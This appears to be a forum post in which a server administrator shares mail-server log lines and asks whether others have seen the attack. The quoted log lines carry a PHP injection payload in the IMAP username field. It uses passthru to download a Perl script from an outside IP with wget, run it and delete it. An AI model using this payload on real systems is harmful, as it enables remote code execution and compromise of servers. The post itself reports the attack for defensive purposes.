Today i noticed the following:
Nov 23 20:47:31 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget
http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget
http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget
http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:47 mail imap4: INFO: LOGOUT, ip=[127.0.0.1], rcvd=434, sent=388
Nov 23 20:47:47 mail imap4: tcpserver: end 20600 status 0
Nov 23 20:47:47 mail imap4: tcpserver: status: 0/40
The Perl script is at
http://188.138.41.134/mad.exe.
i've blocked this IP in CSF, but still i see those lines in the maillog.
Anyone else seen this? It's obviously injecting PHP code through mail server.